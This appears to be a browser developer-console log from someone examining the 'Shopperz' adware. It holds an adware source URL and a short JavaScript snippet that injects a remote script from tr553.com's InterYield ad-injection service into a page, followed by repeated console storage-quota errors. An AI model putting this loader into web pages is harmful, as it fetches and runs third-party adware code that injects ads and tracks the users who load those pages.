-Sources:
-http://intext.nav-links.com/js/intext.js?afid=Bitshakers&subid=clkmidex_ID&maxlinks=8&linkcolor=0000FF&brand=Ads%20by%20shopperz111220151459&help=http%3A%2F%2Fshopperz.me:
-Evaluate in console:
try { 
  var script=document.createElement('script');
  script.src = 'https://www.tr553.com/InterYield/bindevent.do?e=document&affiliate=Bitshakers&subid=clkmidex_ID&brand=Ads+by+shopperz111220151459&adtype=R&help=http%3A%2F%2Fshopperz.me&privacy=privacy+value&terms=terms+value&maxlinks=8&linkcolor=0000FF&uline=green&btcolor=fff&colorbg=ccc&colortitle=0000ee&colordesc=666666&colorvurl=008500&wiki=0&style=Value&debug=false&selector=body&endpoint=https%3A%2F%2Fwww.tr553.com&imgopacity=1&copytext=false&interactionexpectedduration=30&fadein=-1&copies=1&admin=0&inimage=false&rnd=407765';
  document.getElementsByTagName('head')[0].appendChild(script);
} catch (e) {}

Error saving setting with name: consoleHistory, value length: 5597822. Error: Failed to set the 'consoleHistory' property on 'Storage': Setting the value of 'consoleHistory' exceeded the quota.
Ten largest settings: 
Setting: 'consoleHistory', size: 5234863
Setting: 'previouslyViewedFiles', size: 4052
Setting: 'savedURLs', size: 3473
Setting: 'breakpoints', size: 227
Setting: 'watchExpressions', size: 13
Setting: 'lastSelectedSourcesSidebarPaneTab', size: 7
Setting: 'domBreakpoints', size: 2
Setting: 'eventListenerBreakpoints', size: 2
Setting: 'experiments', size: 2
Setting: 'workspaceExcludedFolders', size: 2
<script src=​"https:​/​/​www.tr553.com/​InterYield/​bindevent.do?e=document&affiliate=Bit…ionexpectedduration=30&fadein=-1&copies=1&admin=0&inimage=false&rnd=407765">​</script>​
InterYield documentbind 1.0-SNAPSHOT.70,977 20160203-1417
Error saving setting with name: savedURLs, value length: 3719. Error: Failed to set the 'savedURLs' property on 'Storage': Setting the value of 'savedURLs' exceeded the quota.
Ten largest settings: 
Setting: 'consoleHistory', size: 5234863
Setting: 'previouslyViewedFiles', size: 4052
Setting: 'savedURLs', size: 3473
Setting: 'breakpoints', size: 227
Setting: 'watchExpressions', size: 13
Setting: 'lastSelectedSourcesSidebarPaneTab', size: 7
Setting: 'domBreakpoints', size: 2
Setting: 'eventListenerBreakpoints', size: 2
Setting: 'experiments', size: 2
Setting: 'workspaceExcludedFolders', size: 2
Error saving setting with name: savedURLs, value length: 3760. Error: Failed to set the 'savedURLs' property on 'Storage': Setting the value of 'savedURLs' exceeded the quota.
Ten largest settings: 
Setting: 'consoleHistory', size: 5234863
Setting: 'previouslyViewedFiles', size: 4052
Setting: 'savedURLs', size: 3473
Setting: 'breakpoints', size: 227
Setting: 'watchExpressions', size: 13
Setting: 'lastSelectedSourcesSidebarPaneTab', size: 7
Setting: 'domBreakpoints', size: 2
Setting: 'eventListenerBreakpoints', size: 2
Setting: 'experiments', size: 2
Setting: 'workspaceExcludedFolders', size: 2

